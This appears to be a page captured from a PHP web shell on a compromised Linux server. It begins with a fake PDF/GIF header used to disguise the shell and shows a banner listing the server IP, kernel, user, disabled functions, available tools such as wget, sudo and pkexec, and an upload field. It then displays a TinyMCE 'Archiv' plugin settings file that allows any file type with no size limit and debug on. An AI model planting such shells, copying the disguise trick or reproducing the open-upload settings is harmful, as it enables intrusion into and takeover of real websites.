%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.252 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/www/js/jquery/tiny_mce/plugins/Archiv/ |
Upload File : |
<?php /** * Archiv settings file * * @version 0.1 * @author Wouter van Kuipers Archiv@pwnd.nl * @copyright 2008-2009 pwnd.nl * @license LGPL * @see http://archiv.pwnd.nl * */ # Error reporting error_reporting(-1); # Main settings vars $path = str_replace('/js/jquery/tiny_mce/plugins/Archiv', '', dirname(__FILE__)); $folder = str_replace($_SERVER['DOCUMENT_ROOT'], '', $path); $s = array( # full path to upload files to and show files from 'upload_path' => $path.'/uploads/wysiwyg/', # full URI to upload directory 'upload_uri' => 'http://'.$_SERVER['HTTP_HOST'].$folder.'/uploads/wysiwyg/', # Selectable file types, seperated by a ; (* for all) example *.txt;*.doc;*.pdf 'selectable_files' => '*', # Selectable image types, seperated by a ; (* for all) example *.gif;*.png;*.jpg 'selectable_images' => '*', # Limit of the maximal file size a single file can have (in kB) 'size_limit' => '0', # Maximal files that can be uploaded in a single upload run 'upload_limit' => '0', # Enables debug mode 'debug' => true, # Maximal image width/ height (in px) 'max_image_size' => '600', # Maximal image thumb width/ height (in px) 'max_image_thumb_size' => '100', # Allowed file mime types 'allowed_file_mime' => array('application/x-javascript', 'application/json', 'image/jpg', 'image/png', 'image/gif', 'image/bmp', 'image/tiff', 'text/css', 'application/xml', 'application/msword', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/rtf', 'application/pdf', 'text/html', 'text/plain', 'video/mpeg', 'audio/mpeg3', 'audio/wav', 'audio/aiff', 'video/msvideo', 'video/x-ms-wmv', 'video/quicktime', 'application/zip', 'application/x-tar', 'application/x-shockwave-flash'), # Allowed image mime types 'allowed_image_mime' => array('image/jpg', 'image/jpeg', 'image/png', 'image/gif'), # Language to run the plugin in 'language' => 'en' ); ?>